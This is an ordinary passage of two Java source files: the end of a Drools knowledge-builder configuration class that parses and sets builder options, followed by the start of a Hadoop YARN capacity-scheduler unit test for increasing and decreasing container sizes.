setProperty(ExternaliseCanonicalModelLambdaOption.PROPERTY_NAME,
this.chainedProperties.getProperty(ExternaliseCanonicalModelLambdaOption.PROPERTY_NAME,"true"));
setProperty(ParallelLambdaExternalizationOption.PROPERTY_NAME,
this.chainedProperties.getProperty(ParallelLambdaExternalizationOption.PROPERTY_NAME,"true"));
}
protected ClassLoader getFunctionFactoryClassLoader() {
return getClassLoader();
}
private void buildSeverityMap() {
this.severityMap = new HashMap<String, ResultSeverity>();
Map<String, String> temp = new HashMap<String, String>();
this.chainedProperties.mapStartsWith(temp,
KBuilderSeverityOption.PROPERTY_NAME,
true);
int index = KBuilderSeverityOption.PROPERTY_NAME.length();
for (Map.Entry<String, String> entry : temp.entrySet()) {
String identifier = entry.getKey().trim().substring(index);
this.severityMap.put(identifier,
KBuilderSeverityOption.get(identifier, entry.getValue()).getSeverity());
}
}
public void setProperty(String name,
String value) {
name = name.trim();
if (StringUtils.isEmpty(name)) {
return;
}
if (name.equals(DefaultDialectOption.PROPERTY_NAME)) {
setDefaultDialect(value);
} else if (name.startsWith(AccumulateFunctionOption.PROPERTY_NAME)) {
addAccumulateFunction(name.substring(AccumulateFunctionOption.PROPERTY_NAME.length()),
value);
} else if (name.startsWith(EvaluatorOption.PROPERTY_NAME)) {
this.evaluatorRegistry.addEvaluatorDefinition(value);
} else if (name.equals(DumpDirOption.PROPERTY_NAME)) {
buildDumpDirectory(value);
} else if (name.equals(DefaultPackageNameOption.PROPERTY_NAME)) {
setDefaultPackageName(value);
} else if (name.equals(ProcessStringEscapesOption.PROPERTY_NAME)) {
setProcessStringEscapes(Boolean.parseBoolean(value));
} else if (name.equals(ClassLoaderCacheOption.PROPERTY_NAME)) {
setClassLoaderCacheEnabled(Boolean.parseBoolean(value));
} else if (name.equals(TrimCellsInDTableOption.PROPERTY_NAME)) {
setTrimCellsInDTable(Boolean.parseBoolean(value));
} else if (name.equals(GroupDRLsInKieBasesByFolderOption.PROPERTY_NAME)) {
setGroupDRLsInKieBasesByFolder(Boolean.parseBoolean(value));
} else if (name.startsWith(KBuilderSeverityOption.PROPERTY_NAME)) {
String key = name.substring(name.lastIndexOf('.') + 1);
this.severityMap.put(key, KBuilderSeverityOption.get(key, value).getSeverity());
} else if (name.equals(PropertySpecificOption.PROPERTY_NAME)) {
try {
setPropertySpecificOption(PropertySpecificOption.valueOf(value.toUpperCase()));
} catch (IllegalArgumentException e) {
log.warn("Invalid value " + value + " for option " + PropertySpecificOption.PROPERTY_NAME);
}
} else if (name.equals(LanguageLevelOption.PROPERTY_NAME)) {
try {
setLanguageLevel(LanguageLevelOption.valueOf(value.toUpperCase()));
} catch (IllegalArgumentException e) {
log.warn("Invalid value " + value + " for option " + LanguageLevelOption.PROPERTY_NAME);
}
} else if (name.equals(ParallelRulesBuildThresholdOption.PROPERTY_NAME)) {
setParallelRulesBuildThreshold(Integer.valueOf(value));
} else if (name.equals(ExternaliseCanonicalModelLambdaOption.PROPERTY_NAME)) {
setExternaliseCanonicalModelLambda(Boolean.valueOf(value));
} else if (name.equals(ParallelLambdaExternalizationOption.PROPERTY_NAME)) {
setParallelLambdaExternalization(Boolean.valueOf(value));
} else if (name.equals(AlphaNetworkCompilerOption.PROPERTY_NAME)) {
try {
setAlphaNetworkCompilerOption(AlphaNetworkCompilerOption.determineAlphaNetworkCompilerMode(value.toUpperCase()));
} catch (IllegalArgumentException e) {
log.warn("Invalid value " + value + " for option " + AlphaNetworkCompilerOption.PROPERTY_NAME);
}
} else {
// if the property from the kmodule was not intercepted above, just add it to the chained properties.
Properties additionalProperty = new Properties();
additionalProperty.setProperty(name, value);
chainedProperties.addProperties(additionalProperty);
}
}
public String getProperty(String name) {
name = name.trim();
if (StringUtils.isEmpty(name)) {
return null;
}
if (name.equals(DefaultDialectOption.PROPERTY_NAME)) {
return getDefaultDialect();
} else if (name.equals(DefaultPackageNameOption.PROPERTY_NAME)) {
return getDefaultPackageName();
} else if (name.startsWith(AccumulateFunctionOption.PROPERTY_NAME)) {
int index = AccumulateFunctionOption.PROPERTY_NAME.length();
AccumulateFunction function = this.accumulateFunctions.get(name.substring(index));
return function != null ? function.getClass().getName() : null;
} else if (name.startsWith(EvaluatorOption.PROPERTY_NAME)) {
String key = name.substring(name.lastIndexOf('.') + 1);
EvaluatorDefinition evalDef = this.evaluatorRegistry.getEvaluatorDefinition(key);
return evalDef != null ? evalDef.getClass().getName() : null;
} else if (name.equals(DumpDirOption.PROPERTY_NAME)) {
return this.dumpDirectory != null ? this.dumpDirectory.toString() : null;
} else if (name.equals(ProcessStringEscapesOption.PROPERTY_NAME)) {
return String.valueOf(isProcessStringEscapes());
} else if (name.equals(ClassLoaderCacheOption.PROPERTY_NAME)) {
return String.valueOf(isClassLoaderCacheEnabled());
} else if (name.equals(TrimCellsInDTableOption.PROPERTY_NAME)) {
return String.valueOf(isTrimCellsInDTable());
} else if (name.equals(GroupDRLsInKieBasesByFolderOption.PROPERTY_NAME)) {
return String.valueOf(isGroupDRLsInKieBasesByFolder());
} else if (name.startsWith(KBuilderSeverityOption.PROPERTY_NAME)) {
String key = name.substring(name.lastIndexOf('.') + 1);
ResultSeverity severity = this.severityMap.get(key);
return severity.toString();
} else if (name.equals(LanguageLevelOption.PROPERTY_NAME)) {
return "" + getLanguageLevel();
} else if (name.equals(ParallelRulesBuildThresholdOption.PROPERTY_NAME)) {
return String.valueOf(getParallelRulesBuildThreshold());
} else if (name.equals(ExternaliseCanonicalModelLambdaOption.PROPERTY_NAME)) {
return String.valueOf(isExternaliseCanonicalModelLambda());
} else if (name.equals(ParallelLambdaExternalizationOption.PROPERTY_NAME)) {
return String.valueOf(isParallelLambdaExternalization());
}
return null;
}
public ChainedProperties getChainedProperties() {
return this.chainedProperties;
}
private void buildDialectConfigurationMap() {
DialectConfiguration mvel = ConstraintBuilder.get().createMVELDialectConfiguration();
if (mvel != null) {
mvel.init( this );
dialectConfigurations.put( "mvel", mvel );
}
DialectConfiguration java = ConstraintBuilder.get().createJavaDialectConfiguration();
java.init(this);
dialectConfigurations.put("java", java);
Map<String, String> dialectProperties = new HashMap<String, String>();
this.chainedProperties.mapStartsWith(dialectProperties, "drools.dialect", false);
setDefaultDialect(dialectProperties.get(DefaultDialectOption.PROPERTY_NAME));
}
public void addDialect(String dialectName, DialectConfiguration dialectConf) {
dialectConfigurations.put(dialectName, dialectConf);
}
public DialectCompiletimeRegistry buildDialectRegistry(ClassLoader rootClassLoader,
KnowledgeBuilderConfigurationImpl pkgConf,
PackageRegistry pkgRegistry,
InternalKnowledgePackage pkg) {
DialectCompiletimeRegistry registry = new DialectCompiletimeRegistry();
for (DialectConfiguration conf : this.dialectConfigurations.values()) {
Dialect dialect = conf.newDialect(rootClassLoader, pkgConf, pkgRegistry, pkg);
registry.addDialect(dialect.getId(), dialect);
}
return registry;
}
public String getDefaultDialect() {
return this.defaultDialect.getName();
}
public void setDefaultDialect(String defaultDialect) {
this.defaultDialect = DefaultDialectOption.get(defaultDialect);
}
public DialectConfiguration getDialectConfiguration(String name) {
return this.dialectConfigurations.get(name);
}
public void setDialectConfiguration(String name, DialectConfiguration configuration) {
this.dialectConfigurations.put(name, configuration);
}
public ClassLoader getClassLoader() {
return this.classLoader;
}
public void addSemanticModule(SemanticModule module) {
if (this.semanticModules == null) {
initSemanticModules();
}
this.semanticModules.addSemanticModule(module);
}
public SemanticModules getSemanticModules() {
if (this.semanticModules == null) {
initSemanticModules();
}
return this.semanticModules;
}
public void initSemanticModules() {
this.semanticModules = new SemanticModules();
RulesSemanticModule ruleModule = new RulesSemanticModule("http://ddefault");
this.semanticModules.addSemanticModule(new WrapperSemanticModule("http://drools.org/drools-5.0", ruleModule));
this.semanticModules.addSemanticModule(new WrapperSemanticModule("http://drools.org/drools-5.2", ruleModule));
this.semanticModules.addSemanticModule(new ChangeSetSemanticModule());
// split on each space
String locations[] = this.chainedProperties.getProperty("semanticModules", "").split("\\s");
// load each SemanticModule
for (String moduleLocation : locations) {
// trim leading/trailing spaces and quotes
moduleLocation = moduleLocation.trim();
if (moduleLocation.startsWith("\"")) {
moduleLocation = moduleLocation.substring(1);
}
if (moduleLocation.endsWith("\"")) {
moduleLocation = moduleLocation.substring(0, moduleLocation.length() - 1);
}
if (!moduleLocation.equals("")) {
loadSemanticModule(moduleLocation);
}
}
}
public void loadSemanticModule(String moduleLocation) {
URL url = ConfFileUtils.getURL(moduleLocation, getClassLoader(), getClass());
if (url == null) {
throw new IllegalArgumentException(moduleLocation + " is specified but cannot be found.'");
}
Properties properties = ConfFileUtils.getProperties(url);
if (properties == null) {
throw new IllegalArgumentException(moduleLocation + " is specified but cannot be found.'");
}
loadSemanticModule(properties);
}
public void loadSemanticModule(Properties properties) {
String uri = properties.getProperty("uri", null);
if (uri == null || uri.trim().equals("")) {
throw new RuntimeException("Semantic Module URI property must not be empty");
}
DefaultSemanticModule module = new DefaultSemanticModule(uri);
for (Entry<Object, Object> entry : properties.entrySet()) {
String elementName = (String) entry.getKey();
//uri is processed above, so skip
if ("uri".equals(elementName)) {
continue;
}
if (elementName == null || elementName.trim().equals("")) {
throw new RuntimeException("Element name must be specified for Semantic Module handler");
}
String handlerName = (String) entry.getValue();
if (handlerName == null || handlerName.trim().equals("")) {
throw new RuntimeException("Handler name must be specified for Semantic Module");
}
Handler handler = (Handler) ClassUtils.instantiateObject(handlerName,
getClassLoader());
if (handler == null) {
throw new RuntimeException("Unable to load Semantic Module handler '" + elementName + ":" + handlerName + "'");
} else {
module.addHandler(elementName,
handler);
}
}
this.semanticModules.addSemanticModule(module);
}
public void addAccumulateFunction(String identifier, String className) {
this.accumulateFunctions.put(identifier,
AccumulateUtil.loadAccumulateFunction(getClassLoader(), identifier,
className));
}
public void addAccumulateFunction(String identifier,
Class<? extends AccumulateFunction> clazz) {
try {
this.accumulateFunctions.put(identifier,
clazz.newInstance());
} catch (InstantiationException e) {
throw new RuntimeException("Error loading accumulate function for identifier " + identifier + ". Instantiation failed for class " + clazz.getName(),
e);
} catch (IllegalAccessException e) {
throw new RuntimeException("Error loading accumulate function for identifier " + identifier + ". Illegal access to class " + clazz.getName(),
e);
}
}
public AccumulateFunction getAccumulateFunction(String identifier) {
return this.accumulateFunctions.get(identifier);
}
// Used by droolsjbpm-tools
public Collection<String> getAccumulateFunctionNames() {
return this.accumulateFunctions.keySet();
}
private void buildEvaluatorRegistry() {
this.evaluatorRegistry = new EvaluatorRegistry( getFunctionFactoryClassLoader() );
Map<String, String> temp = new HashMap<String, String>();
this.chainedProperties.mapStartsWith(temp,
EvaluatorOption.PROPERTY_NAME,
true);
for (Entry<String, String> e : temp.entrySet()) {
String key = e.getKey();
// filtering out unused properties, to avoid failing when an old packagebuilder.conf
// file is present on the classpath that did define these (for example when parsing
// a rule in Eclipse plugin using old runtime)
if ("drools.evaluator.equality".equals(key)
|| ("drools.evaluator.comparable".equals(key))) {
continue;
}
this.evaluatorRegistry.addEvaluatorDefinition(e.getValue());
}
}
/**
* Returns the evaluator registry for this package builder configuration
* @return
*/
public EvaluatorRegistry getEvaluatorRegistry() {
return this.evaluatorRegistry;
}
/**
* Adds an evaluator definition class to the registry using the
* evaluator class name. The class will be loaded and the corresponting
* evaluator ID will be added to the registry. In case there exists
* an implementation for that ID already, the new implementation will
* replace the previous one.
*
* @param className the name of the class for the implementation definition.
* The class must implement the EvaluatorDefinition interface.
*/
public void addEvaluatorDefinition(String className) {
this.evaluatorRegistry.addEvaluatorDefinition(className);
}
/**
* Adds an evaluator definition class to the registry. In case there exists
* an implementation for that evaluator ID already, the new implementation will
* replace the previous one.
*
* @param def the evaluator definition to be added.
*/
public void addEvaluatorDefinition(EvaluatorDefinition def) {
this.evaluatorRegistry.addEvaluatorDefinition(def);
}
private void buildDumpDirectory() {
String dumpStr = this.chainedProperties.getProperty(DumpDirOption.PROPERTY_NAME,
null);
buildDumpDirectory(dumpStr);
}
private void buildDumpDirectory(String dumpStr) {
if (dumpStr != null) {
setDumpDir(new File(dumpStr));
}
}
public File getDumpDir() {
return this.dumpDirectory;
}
public void setDumpDir(File dumpDir) {
if (!dumpDir.isDirectory() || !dumpDir.canWrite() || !dumpDir.canRead()) {
throw new RuntimeException("Drools dump directory is not accessible: " + dumpDir.toString());
}
this.dumpDirectory = dumpDir;
}
public boolean isProcessStringEscapes() {
return processStringEscapes;
}
public void setProcessStringEscapes(boolean processStringEscapes) {
this.processStringEscapes = processStringEscapes;
}
@Deprecated
public boolean isClassLoaderCacheEnabled() {
return classLoaderCache;
}
@Deprecated
public void setClassLoaderCacheEnabled(boolean classLoaderCacheEnabled) {
this.classLoaderCache = classLoaderCacheEnabled;
}
public boolean isTrimCellsInDTable() {
return trimCellsInDTable;
}
public void setTrimCellsInDTable( boolean trimCellsInDTable ) {
this.trimCellsInDTable = trimCellsInDTable;
}
public boolean isGroupDRLsInKieBasesByFolder() {
return groupDRLsInKieBasesByFolder;
}
public void setGroupDRLsInKieBasesByFolder( boolean groupDRLsInKieBasesByFolder ) {
this.groupDRLsInKieBasesByFolder = groupDRLsInKieBasesByFolder;
}
public int getParallelRulesBuildThreshold() {
return parallelRulesBuildThreshold.getParallelRulesBuildThreshold();
}
public void setParallelRulesBuildThreshold(int parallelRulesBuildThreshold) {
this.parallelRulesBuildThreshold = ParallelRulesBuildThresholdOption.get(parallelRulesBuildThreshold);
}
public String getDefaultPackageName() {
return defaultPackageName;
}
public void setDefaultPackageName(String defaultPackageName) {
this.defaultPackageName = defaultPackageName;
}
public LanguageLevelOption getLanguageLevel() {
return languageLevel;
}
public void setLanguageLevel(LanguageLevelOption languageLevel) {
this.languageLevel = languageLevel;
}
public PropertySpecificOption getPropertySpecificOption() {
return propertySpecificOption;
}
public void setPropertySpecificOption(PropertySpecificOption propertySpecificOption) {
this.propertySpecificOption = propertySpecificOption;
}
public boolean isExternaliseCanonicalModelLambda() {
return externaliseCanonicalModelLambda;
}
public void setExternaliseCanonicalModelLambda(boolean externaliseCanonicalModelLambda) {
this.externaliseCanonicalModelLambda = externaliseCanonicalModelLambda;
}
public boolean isParallelLambdaExternalization() {
return parallelLambdaExternalization;
}
public void setParallelLambdaExternalization(boolean parallelLambdaExternalization) {
this.parallelLambdaExternalization = parallelLambdaExternalization;
}
public AlphaNetworkCompilerOption getAlphaNetworkCompilerOption() {
return alphaNetworkCompilerOption;
}
public void setAlphaNetworkCompilerOption(AlphaNetworkCompilerOption alphaNetworkCompilerOption) {
this.alphaNetworkCompilerOption = alphaNetworkCompilerOption;
}
@SuppressWarnings("unchecked")
public <T extends SingleValueKnowledgeBuilderOption> T getOption(Class<T> option) {
if (DefaultDialectOption.class.equals(option)) {
return (T) this.defaultDialect;
} else if (DumpDirOption.class.equals(option)) {
return (T) DumpDirOption.get(this.dumpDirectory);
} else if (ProcessStringEscapesOption.class.equals(option)) {
return (T) (this.processStringEscapes ? ProcessStringEscapesOption.YES : ProcessStringEscapesOption.NO);
} else if (DefaultPackageNameOption.class.equals(option)) {
return (T) DefaultPackageNameOption.get(this.defaultPackageName);
} else if (ClassLoaderCacheOption.class.equals(option)) {
return (T) (this.classLoaderCache ? ClassLoaderCacheOption.ENABLED : ClassLoaderCacheOption.DISABLED);
} else if (TrimCellsInDTableOption.class.equals(option)) {
return (T) (this.trimCellsInDTable ? TrimCellsInDTableOption.ENABLED : TrimCellsInDTableOption.DISABLED);
} else if (GroupDRLsInKieBasesByFolderOption.class.equals(option)) {
return (T) (this.groupDRLsInKieBasesByFolder ? GroupDRLsInKieBasesByFolderOption.ENABLED : GroupDRLsInKieBasesByFolderOption.DISABLED);
} else if (PropertySpecificOption.class.equals(option)) {
return (T) propertySpecificOption;
} else if (LanguageLevelOption.class.equals(option)) {
return (T) languageLevel;
} else if (ExternaliseCanonicalModelLambdaOption.class.equals(option)) {
return (T) (externaliseCanonicalModelLambda ? ExternaliseCanonicalModelLambdaOption.ENABLED : ExternaliseCanonicalModelLambdaOption.DISABLED);
} else if (ParallelLambdaExternalizationOption.class.equals(option)) {
return (T) (parallelLambdaExternalization ? ParallelLambdaExternalizationOption.ENABLED : ParallelLambdaExternalizationOption.DISABLED);
} else if (AlphaNetworkCompilerOption.class.equals(option)) {
return (T) alphaNetworkCompilerOption;
}
return null;
}
@SuppressWarnings("unchecked")
public <T extends MultiValueKnowledgeBuilderOption> T getOption(Class<T> option,
String key) {
if (AccumulateFunctionOption.class.equals(option)) {
return (T) AccumulateFunctionOption.get(key,
this.accumulateFunctions.get(key));
} else if (EvaluatorOption.class.equals(option)) {
return (T) EvaluatorOption.get(key,
this.evaluatorRegistry.getEvaluatorDefinition(key));
} else if (KBuilderSeverityOption.class.equals(option)) {
return (T) KBuilderSeverityOption.get(key,
this.severityMap.get(key));
}
return null;
}
public <T extends MultiValueKnowledgeBuilderOption> Set<String> getOptionKeys(
Class<T> option) {
if (AccumulateFunctionOption.class.equals(option)) {
return this.accumulateFunctions.keySet();
} else if (EvaluatorOption.class.equals(option)) {
return this.evaluatorRegistry.keySet();
} else if (KBuilderSeverityOption.class.equals(option)) {
return this.severityMap.keySet();
}
return null;
}
public <T extends KnowledgeBuilderOption> void setOption(T option) {
if (option instanceof DefaultDialectOption) {
this.defaultDialect = (DefaultDialectOption) option;
} else if (option instanceof AccumulateFunctionOption) {
this.accumulateFunctions.put(((AccumulateFunctionOption) option).getName(),
((AccumulateFunctionOption) option).getFunction());
} else if (option instanceof DumpDirOption) {
this.dumpDirectory = ((DumpDirOption) option).getDirectory();
} else if (option instanceof EvaluatorOption) {
this.evaluatorRegistry.addEvaluatorDefinition((EvaluatorDefinition) ((EvaluatorOption) option).getEvaluatorDefinition());
} else if (option instanceof ProcessStringEscapesOption) {
this.processStringEscapes = ((ProcessStringEscapesOption) option).isProcessStringEscapes();
} else if (option instanceof DefaultPackageNameOption) {
setDefaultPackageName(((DefaultPackageNameOption) option).getPackageName());
} else if (option instanceof ClassLoaderCacheOption) {
setClassLoaderCacheEnabled(((ClassLoaderCacheOption) option).isClassLoaderCacheEnabled());
} else if (option instanceof TrimCellsInDTableOption) {
setTrimCellsInDTable(((TrimCellsInDTableOption) option).isTrimCellsInDTable());
} else if (option instanceof GroupDRLsInKieBasesByFolderOption) {
setGroupDRLsInKieBasesByFolder(((GroupDRLsInKieBasesByFolderOption) option).isGroupDRLsInKieBasesByFolder());
} else if (option instanceof KBuilderSeverityOption) {
this.severityMap.put(((KBuilderSeverityOption) option).getName(), ((KBuilderSeverityOption) option).getSeverity());
} else if (option instanceof PropertySpecificOption) {
propertySpecificOption = (PropertySpecificOption) option;
} else if (option instanceof LanguageLevelOption) {
this.languageLevel = ((LanguageLevelOption) option);
} else if (option instanceof ExternaliseCanonicalModelLambdaOption) {
this.externaliseCanonicalModelLambda = ((ExternaliseCanonicalModelLambdaOption) option).isCanonicalModelLambdaExternalized();
} else if (option instanceof ParallelLambdaExternalizationOption) {
this.parallelLambdaExternalization = ((ParallelLambdaExternalizationOption) option).isLambdaExternalizationParallel();
} else if (option instanceof AlphaNetworkCompilerOption) {
this.alphaNetworkCompilerOption = ((AlphaNetworkCompilerOption) option);
}
}
public CompilationCache getCompilationCache() {
return compilationCache;
}
public void setCompilationCache(CompilationCache cache) {
this.compilationCache = cache;
}
public boolean isPreCompiled() {
return this.compilationCache != null;
}
}
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.List;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.yarn.api.protocolrecords.AllocateResponse;
import org.apache.hadoop.yarn.api.records.ApplicationAttemptId;
import org.apache.hadoop.yarn.api.records.Container;
import org.apache.hadoop.yarn.api.records.ContainerId;
import org.apache.hadoop.yarn.api.records.ContainerUpdateType;
import org.apache.hadoop.yarn.api.records.NodeId;
import org.apache.hadoop.yarn.api.records.Priority;
import org.apache.hadoop.yarn.api.records.ResourceRequest;
import org.apache.hadoop.yarn.api.records.UpdateContainerRequest;
import org.apache.hadoop.yarn.api.records.UpdatedContainer;
import org.apache.hadoop.yarn.conf.YarnConfiguration;
import org.apache.hadoop.yarn.server.resourcemanager.MockAM;
import org.apache.hadoop.yarn.server.resourcemanager.MockNM;
import org.apache.hadoop.yarn.server.resourcemanager.MockRM;
import org.apache.hadoop.yarn.server.resourcemanager.nodelabels.NullRMNodeLabelsManager;
import org.apache.hadoop.yarn.server.resourcemanager.nodelabels.RMNodeLabelsManager;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMApp;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptState;
import org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainer;
import org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerEvent;
import org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerEventType;
import org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerState;
import org.apache.hadoop.yarn.server.resourcemanager.rmnode.RMNode;
import org.apache.hadoop.yarn.server.resourcemanager.rmnode.RMNodeImpl;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.ResourceScheduler;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler
.SchedulerApplicationAttempt;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.common.fica.FiCaSchedulerApp;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.common.fica
.FiCaSchedulerNode;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.event.AppAttemptRemovedSchedulerEvent;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.event.NodeUpdateSchedulerEvent;
import org.apache.hadoop.yarn.util.resource.Resources;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
public class TestContainerResizing {
private static final Log LOG = LogFactory.getLog(TestContainerResizing.class);
private final int GB = 1024;
private YarnConfiguration conf;
RMNodeLabelsManager mgr;
class MyScheduler extends CapacityScheduler {
/*
* A Mock Scheduler to simulate the potential effect of deadlock between:
* 1. The AbstractYarnScheduler.decreaseContainers() call (from
* ApplicationMasterService thread)
* 2. The CapacityScheduler.allocateContainersToNode() call (from the
* scheduler thread)
*/
MyScheduler() {
super();
}
@Override
protected void decreaseContainers(
List<UpdateContainerRequest> decreaseRequests,
SchedulerApplicationAttempt attempt) {
try {
Thread.sleep(1000);
} catch(InterruptedException e) {
LOG.debug("Thread interrupted.");
}
super.decreaseContainers(decreaseRequests, attempt);
}
@Override
public synchronized void allocateContainersToNode(FiCaSchedulerNode node) {
try {
Thread.sleep(1000);
} catch(InterruptedException e) {
LOG.debug("Thread interrupted.");
}
super.allocateContainersToNode(node);
}
}
@Before
public void setUp() throws Exception {
conf = new YarnConfiguration();
conf.setClass(YarnConfiguration.RM_SCHEDULER, CapacityScheduler.class,
ResourceScheduler.class);
mgr = new NullRMNodeLabelsManager();
mgr.init(conf);
}
@Test
public void testSimpleIncreaseContainer() throws Exception {
/**
* Application has a container running, and the node has enough available
* resource. Add a increase request to see if container will be increased
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 20 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
ContainerId containerId1 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
sentRMContainerLaunched(rm1, containerId1);
// am1 asks to change its AM container from 1GB to 3GB
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(3 * GB))));
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
checkPendingResource(rm1, "default", 2 * GB, null);
Assert.assertEquals(2 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// NM1 do 1 heartbeats
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
// Pending resource should be deducted
checkPendingResource(rm1, "default", 0 * GB, null);
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
verifyContainerIncreased(am1.allocate(null, null), containerId1, 3 * GB);
verifyAvailableResourceOfSchedulerNode(rm1, nm1.getNodeId(), 17 * GB);
rm1.close();
}
@Test
public void testSimpleDecreaseContainer() throws Exception {
/**
* Application has a container running, try to decrease the container and
* check queue's usage and container resource will be updated.
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 20 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(3 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
checkUsedResource(rm1, "default", 3 * GB, null);
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
ContainerId containerId1 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
sentRMContainerLaunched(rm1, containerId1);
// am1 asks to change its AM container from 1GB to 3GB
AllocateResponse response = am1.sendContainerResizingRequest(Arrays
.asList(UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.DECREASE_RESOURCE,
Resources.createResource(1 * GB))));
verifyContainerDecreased(response, containerId1, 1 * GB);
checkUsedResource(rm1, "default", 1 * GB, null);
Assert.assertEquals(1 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
// Check if decreased containers added to RMNode
RMNodeImpl rmNode =
(RMNodeImpl) rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
Collection<Container> decreasedContainers =
rmNode.getToBeDecreasedContainers();
boolean rmNodeReceivedDecreaseContainer = false;
for (Container c : decreasedContainers) {
if (c.getId().equals(containerId1)
&& c.getResource().equals(Resources.createResource(1 * GB))) {
rmNodeReceivedDecreaseContainer = true;
}
}
Assert.assertTrue(rmNodeReceivedDecreaseContainer);
rm1.close();
}
@Test
public void testSimpleIncreaseRequestReservation() throws Exception {
/**
* Application has two containers running, try to increase one of then, node
* doesn't have enough resource, so the increase request will be reserved.
* Check resource usage after container reserved, finish a container, the
* reserved container should be allocated.
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 8 * GB);
MockNM nm2 = rm1.registerNode("h2:1234", 8 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
// Allocate two more containers
am1.allocate(
Arrays.asList(ResourceRequest.newInstance(Priority.newInstance(1), "*",
Resources.createResource(2 * GB), 1)),
null);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
Assert.assertTrue(rm1.waitForState(nm1, containerId2,
RMContainerState.ALLOCATED, 10 * 1000));
// Acquire them, and NM report RUNNING
am1.allocate(null, null);
sentRMContainerLaunched(rm1, containerId2);
ContainerId containerId1 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
sentRMContainerLaunched(rm1, containerId1);
// am1 asks to change its AM container from 1GB to 3GB
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(7 * GB))));
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// NM1 do 1 heartbeats
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
RMContainer rmContainer1 = app.getLiveContainersMap().get(containerId1);
/* Check reservation statuses */
// Increase request should be reserved
Assert.assertTrue(rmContainer1.hasIncreaseReservation());
Assert.assertEquals(6 * GB, rmContainer1.getReservedResource().getMemorySize());
Assert.assertFalse(app.getReservedContainers().isEmpty());
Assert.assertNotNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
// Pending resource will not be changed since it's not satisfied
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 9 * GB, null);
Assert.assertEquals(9 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
Assert.assertEquals(6 * GB,
